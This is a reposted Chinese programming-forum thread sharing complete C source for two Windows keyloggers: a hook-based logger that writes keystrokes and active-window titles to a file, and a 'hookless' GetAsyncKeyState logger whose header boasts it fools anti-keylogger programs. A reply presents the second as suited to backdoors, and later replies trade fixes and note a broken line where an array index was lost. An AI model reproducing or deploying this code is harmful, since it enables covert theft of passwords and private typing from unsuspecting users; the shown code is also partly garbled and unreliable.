[转载]C写的一个键盘记录程序
作者:飘忽不定来源:偶抢劫了他
[language=c]
//---------------------------------------------------------------------------
#include <vcl.h>
#include <stdio.h>
#pragma hdrstop
#include "main.h"
//---------------------------------------------------------------------------
#pragma package(smart_init)
#pragma resource "*.dfm"
//---------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam);
//钩子变量
HHOOK g_hLogHook=NULL;
//记录上一次得到焦点的窗口句柄
HWND g_hLastFocus=NULL;
//键盘掩码变量
const int KeyPressMask=0x80000000;
//保存上一次按键值
//char g_PrvChar;
//---------------------------------------------------------------------------
HOOKPROC JournalLogProc(int iCode,WPARAM wParam,LPARAM lParam)
{
if(iCode<0) return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
if(iCode==HC_ACTION)
{
EVENTMSG* pEvt=(EVENTMSG*)lParam;
int i;
HWND hFocus; //保存当前活动窗口句柄
char szTitle[256]; //当前窗口名称
char szTime[128]; //当前的Ri期和时间
FILE *stream=fopen("f:\\My\\logfile.txt","a+");
if(pEvt->message==WM_KEYDOWN)
{
int vKey=LOBYTE(pEvt->paramL); //取得虚拟键值
char ch;
char str[10];
hFocus=GetActiveWindow(); //获得活动窗口的句柄
if(g_hLastFocus!=hFocus)
{
GetWindowText(hFocus,szTitle,256); //取得一个窗体的标题
g_hLastFocus=hFocus;
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
int iShift=GetKeyState(0x10);
int iCapital=GetKeyState(0x14);
int iNumLock=GetKeyState(0x90);
bool bShift=(iShift&KeyPressMask)==KeyPressMask;
bool bCapital=(iCapital&1)==1;
bool bNumLock=(iNumLock&1)==1;
if(vKey==9) //TAB
fprintf(stream,"%c",'\t');
if(vKey==13) //回车键
fprintf(stream,"%c",'\n');
if(vKey>=48 && vKey<=57) //数字键0-9
{
if(!bShift)
fprintf(stream,"%c",vKey);
else
{
switch(vKey)
{
case 49:
ch='!';
break;
case 50:
ch='@';
break;
case 51:
ch='#';
break;
case 52:
ch='$';
break;
case 53:
ch='%';
break;
case 54:
ch='^';
break;
case 55:
ch='&';
break;
case 56:
ch='*';
break;
case 57:
ch='(';
break;
case 48:
ch=')';
break;
}
fprintf(stream,"%c",ch);
}
}
if(vKey>=65 && vKey<=90) //A-Z a-z
{
if(!bCapital)
{
if(bShift)
ch=vKey;
else
ch=vKey+32;
}
else if(bShift)
ch=vKey+32;
else
ch=vKey;
fprintf(stream,"%c",ch);
}
if(vKey>=96 && vKey<=105) //小键盘0-9
{
if(bNumLock)
fprintf(stream,"%c",vKey-96+48);
}
if(vKey>=186 && vKey<=222) //其它键
{
switch(vKey)
{
case 186:
if (!bShift)
ch=';';
else
ch=':';
break;
case 187:
if (!bShift)
ch='=';
else
ch='+';
break;
case 188:
if (!bShift)
ch=',';
else
ch='<';
break;
case 189:
if (!bShift)
ch='-';
else
ch='_';
break;
case 190:
if (!bShift)
ch='.';
else
ch='>';
break;
case 191:
if (!bShift)
ch='/';
else
ch='?';
break;
case 192:
if (!bShift)
ch='`';
else
ch='~';
break;
case 219:
if (!bShift)
ch='[';
else
ch='{';
break;
case 220:
if (!bShift)
ch='\\';
else
ch='|';
break;
case 221:
if (!bShift)
ch=']';
else
ch='}';
break;
case 222:
if (!bShift)
ch='\'';
else
ch='\"';
break;
default:
ch='n';
break;
}
if (ch!='n' )
fprintf(stream,"%c",ch);
} //
if(vKey>=112 && vKey<=123) // 功能键 [F1]-[F12]
{
switch(wParam)
{
case 112:
fprintf(stream,"%s","[F1]");
break;
case 113:
fprintf(stream,"%s","[F2]");
break;
case 114:
fprintf(stream,"%s","[F3]");
break;
case 115:
fprintf(stream,"%s","[F4]");
break;
case 116:
fprintf(stream,"%s","[F5]");
break;
case 117:
fprintf(stream,"%s","[F6]");
break;
case 118:
fprintf(stream,"%s","[F7]");
break;
case 119:
fprintf(stream,"%s","[F8]");
break;
case 120:
fprintf(stream,"%s","[F9]");
break;
case 121:
fprintf(stream,"%s","[F10]");
break;
case 122:
fprintf(stream,"%s","[F11]");
break;
case 123:
fprintf(stream,"%s","[F12]");
break;
}
}
if (vKey>=8 && vKey<=46) //方向键
{
switch (vKey)
{
case 8:
strcpy(str,"[BK]");
break;
case 9:
strcpy(str,"[TAB]");
break;
case 13:
strcpy(str,"[EN]");
break;
case 27:
strcpy(str,"[ESC]");
break;
case 32:
strcpy(str,"[SP]");
break;
case 33:
strcpy(str,"[PU]");
break;
case 34:
strcpy(str,"[PD]");
break;
case 35:
strcpy(str,"[END]");
break;
case 36:
strcpy(str,"[HOME]");
break;
case 37:
strcpy(str,"[LF]");
break;
case 38:
strcpy(str,"[UF]");
break;
case 39:
strcpy(str,"[RF]");
break;
case 40:
strcpy(str,"[DF]");
break;
case 45:
strcpy(str,"[INS]");
break;
case 46:
strcpy(str,"[DEL]");
break;
default:
ch='n';
break;
}
if (ch!='n' )
{
//if (g_PrvChar!=vKey)
//{
fprintf(stream,"%s",str);
//g_PrvChar=vKey;
//}
}
}
}
if(pEvt->message==WM_LBUTTONDOWN||pEvt->message==WM_RBUTTONDOWN)
{
hFocus=GetActiveWindow();
if(g_hLastFocus!=hFocus)
{
g_hLastFocus=hFocus;
GetWindowText(hFocus,szTitle,256);
strcpy(szTime,DateTimeToStr(Now()).c_str());
fprintf(stream,"%c%s%c%c%s",10,szTime,32,32,szTitle);
fprintf(stream,"%c%c",32,32);
}
}
fclose(stream);
}
return (HOOKPROC)CallNextHookEx(g_hLogHook,iCode,wParam,lParam);
}
//---------------------------------------------------------------------------
TForm1 *Form1;
//---------------------------------------------------------------------------
__fastcall TForm1::TForm1(TComponent* Owner)
: TForm(Owner)
{
}
//---------------------------------------------------------------------------
void __fastcall TForm1::ButtonInstallClick(TObject *Sender)
{
if(g_hLogHook==NULL)
g_hLogHook=SetWindowsHookEx(WH_JOURNALRECORD,(HOOKPROC)JournalLogProc,HInstance,0);
}
//---------------------------------------------------------------------------
void __fastcall TForm1::ButtonUninstallClick(TObject *Sender)
{
if(g_hLogHook!=NULL)
{
UnhookWindowsHookEx(g_hLogHook);
g_hLogHook=NULL;
}
}
//---------------------------------------------------------------------------
[/language] e:\turboc\keyboard.c(3) : fatal error C1083: Cannot open include file: 'vcl.h': No such file or directory
以上是我的调试结果啊,不知道哪里可以找到头文件呢?
我的机子是没有的啦!^_^,谢谢啦,知道的请告诉我一声啦,谢谢! 晕~~你在VC++中编译的吗?
这个很明显是要用BCB来编译的啊。
你可以把关键的代码搞到VC中,自己重写一下,不需要改多少就可以用了。 截获消息循环写的击键记录代码网络有很多的.大多不能放在后门中,大多后门是console,没有消息循环的.
这里给出一份wineggdrop的keylog的源代码,优势很明显,不用消息循环就可以记录按键信息.
[code]
代码:--------------------------------------------------------------------------------
//**********************************************************************
// Version: V1.0
// Coder: WinEggDrop
// Date Release: NULL
// Purpose: Hookless Keylogger
// Test PlatForm: Win 2K Pro And Server SP4
// Compiled On: LCC 3.0,May Compile On VC++ 6.0(Not Test Yet)
// Limitation: More Usage Of System Resource; May Not Work On Win9x
// Advantage: Hookless Technique Fools Anti-Keylogger Programs
//**********************************************************************
#include <windows.h>
#include <stdio.h>
// Some Global Variables
// Lower Case Key & Some Other Keys
char *LowerCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"`",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
"0",
"-",
"=",
"[TAB]",
"q",
"w",
"e",
"r",
"t",
"y",
"u",
"i",
"o",
"p",
"[",
"]",
"a",
"s",
"d",
"f",
"g",
"h",
"j",
"k",
"l",
";",
"'",
"z",
"x",
"c",
"v",
"b",
"n",
"m",
",",
".",
"/",
"\\",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[Left]",
"[UP]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};
// Upper Case Key & Some Other Keys
char *UpperCase[]={
"b",
"e",
"[ESC]",
"[F1]",
"[F2]",
"[F3]",
"[F4]",
"[F5]",
"[F6]",
"[F7]",
"[F8]",
"[F9]",
"[F10]",
"[F11]",
"[F12]",
"~",
"!",
"@",
"#",
"$",
"%",
"^",
"&",
"*",
"(",
")",
"_",
"+",
"[TAB]",
"Q",
"W",
"E",
"R",
"T",
"Y",
"U",
"I",
"O",
"P",
"{",
"}",
"A",
"S",
"D",
"F",
"G",
"H",
"J",
"K",
"L",
":",
"\"",
"Z",
"X",
"C",
"V",
"B",
"N",
"M",
"<",
">",
".?",
"|",
"[CTRL]",
"[WIN]",
" ",
"[WIN]",
"[Print Screen]",
"[Scroll Lock]",
"[Insert]",
"[Home]",
"[PageUp]",
"[Del]",
"[End]",
"[PageDown]",
"[Left]",
"[Up]",
"[Right]",
"[Down]",
"[Num Lock]",
"/",
"*",
"-",
"+",
"0",
"1",
"2",
"3",
"4",
"5",
"6",
"7",
"8",
"9",
".",
};
// Ascii Keys,Forget About It
int SpecialKeys[]={
8,
13,
27,
112,
113,
114,
115,
116,
117,
118,
119,
120,
121,
122,
123,
192,
49,
50,
51,
52,
53,
54,
55,
56,
57,
48,
189,
187,
9,
81,
87,
69,
82,
84,
89,
85,
73,
79,
80,
219,
221,
65,
83,
68,
70,
71,
72,
74,
75,
76,
186,
222,
90,
88,
67,
86,
66,
78,
77,
188,
190,
191,
220,
17,
91,
32,
92,
44,
145,
45,
36,
33,
46,
35,
34,
37,
38,
39,
40,
144,
111,
106,
109,
107,
96,
97,
98,
99,
100,
101,
102,
103,
104,
105,
110,
};
HWND PreviousFocus=NULL;
// End Of Data
// Function ProtoType Declaration
//----------------------------------------------------------------------
BOOL IsWindowsFocusChange();
BOOL KeyLogger();
//----------------------------------------------------------------------
// End Of Fucntion ProtoType Declaration
// Main Function
int main()
{
KeyLogger(); // Run The Keylogger
return 0; // The Program Quit
}
// End Of Main
//-------------------------------------------------------------------------
// Purpose: To Check The Active Windows Title
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL IsWindowsFocusChange()
{
HWND hFocus = GetForegroundWindow(); // Retrieve The Active Windows's Focus
BOOL ReturnFlag = FALSE; // Declare The Return Flag
if (hFocus != PreviousFocus) // The Active Windows Has Change
{
PreviousFocus = hFocus; // Save The Old Active Windos Focus
int WinLeng = GetWindowTextLength(hFocus); // Get The Active Windows's Caption's Length
char *WindowCaption = (char*) malloc(sizeof(char) * (WinLeng + 2)); // Allocate Memory For The Caption
GetWindowText(hFocus,WindowCaption,(WinLeng + 1)); // Retrieve The Active Windows's Caption
if (strlen(WindowCaption) > 0) // Really Get The Windows's Caption
{
printf("\r\nThe Active Windows Title: %s\r\n",WindowCaption); // Display The Active Windows's Caption
ReturnFlag=TRUE; // Indicate The Windows's Focus Has Changed
}
free(WindowCaption); // Free The Allocated Memory
}
return ReturnFlag; // Return The Flag
}// End Of IsWindowsFocusChange Function
//-------------------------------------------------------------------------
// Purpose: To Manage(Display)The Keys Retrieved From System's Key Buffer
// Return Type: Boolean
// Parameters: NULL
//-------------------------------------------------------------------------
BOOL KeyLogger()
{
int bKstate[256] = {0}; // Declare The Key State Array
int i,x;
char KeyBuffer[600]; // Key Buffer Array
int state; // Variable To Hode State Of Some Special Key Like CapsLock,Shift And ect
int shift; // Variable To Hode State Of Shift Key
// Reset The Buffer
memset(KeyBuffer,0,sizeof(KeyBuffer));
while(TRUE) // Forever Loop Is Taking Place Here
{
Sleep(8); // Rest For A While,And Avoid Taking 100% CPU Usage.Pretty Important To Add This Line Or The System Gets Fucked UP
if (IsWindowsFocusChange()) //Check The Active Windows Title
{
if (strlen(KeyBuffer) != 0) // Keys Are Pressed
{
printf("%s\r\n",KeyBuffer); // Display The Keys Pressed
memset(KeyBuffer,0,sizeof(KeyBuffer)); // reset The Buffer
}
}
for(i=0;i<92;i++) // Looping To Check Visual Keys
{
shift = GetKeyState(VK_SHIFT); // Check Whether Shift Is Pressed
x = SpecialKeys; // Match The Key
if (GetAsyncKeyState(x) & 0x8000) // Check Combination Keys
{
// See Whether CapsLocak Or Shift Is Pressed
if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Not Pressed
{
bKstate[x] = 1; //Uppercase Characters A-Z
}
else
if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91))) //Caps Lock And Shift Is Pressed
{
bKstate[x] = 2; //Lowercase a-z
}
else
if (shift < 0) // Shift Is Pressed
{
bKstate[x] = 3; //Uppercase Characters A-Z
}
else
bKstate[x] = 4; //Lowercase a-z
}
else
{
if (bKstate[x] != 0) // No Combination Keys Detected
{
state = bKstate[x]; // Retrieve The Current State
bKstate[x] = 0; // Reset The Current State
if (x == 8) // Back Space Is Detected
{
KeyBuffer[strlen(KeyBuffer) - 1] = 0; // One Key Back Then
continue; // Start A New Loop
}
else
if (strlen(KeyBuffer) > 550) // Buffer FULL
{
printf("%s <Buffer Full>",KeyBuffer); // Display The Keys Retrieved
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Reset The Buffer
continue; // Start A New Loop
}
else
if (x == 13) // Enter Is Detected
{
if (strlen(KeyBuffer) == 0) // No Other Keys Retrieved But Enter
{
continue; // Start A New Loop
}
printf("%s<Enter>\r\n",KeyBuffer); // Retrieve Other Keys With Enter
memset(KeyBuffer,0,sizeof(KeyBuffer)); // Display The Keys With Enter
continue; // Start A New Loop
}
else
if ((state%2) == 1) //Must Be Upper Case Characters
{
strcat(KeyBuffer,UpperCase); // Store The Key To Key Buffer
}
else
if ((state%2) == 0) // Must Be Lower Case Characters
{
strcat(KeyBuffer,LowerCase); // Store The Key To Key Buffer
}
}
}
}// End Of For Loop
}// End Of While Loop
return TRUE; // Return To The Caller
}// End Of KeyLogger Function
// End Of File
[/code] 劣势也有,太快的输入会造成记录的遗漏.不过有胜于无.我只有这个版本的代码,不知道有没有人有更新的? 要想不会造成记录的遗漏,可采用多线程! 欲哭无泪,早发现wineggdrop就keylog就好了. 看了一下,用GetAsyncKeyState来写的,的确,如果按得太快的话,会遗漏. x = SpecialKeys;
这一句啥意?
x是int型,Specialkeys是int *型,
把一个指针赋给一个整形,干嘛? 这个其实就是一个bcb的源码
不过还是不错的
不过不错是最优算法 这可以记录中文的吗?不能记录中文有什么用 [quote][b]引用第8楼[i]xiao2004[/i]于[i]2005-09-28 11:24[/i]发表的[/b]:
x = SpecialKeys;
这一句啥意?
x是int型,Specialkeys是int *型,
把一个指针赋给一个整形,干嘛?[/quote]
那个地方应该是写错了吧。貌似应该是:x = SpecialKeys[ i ];
页:
[1]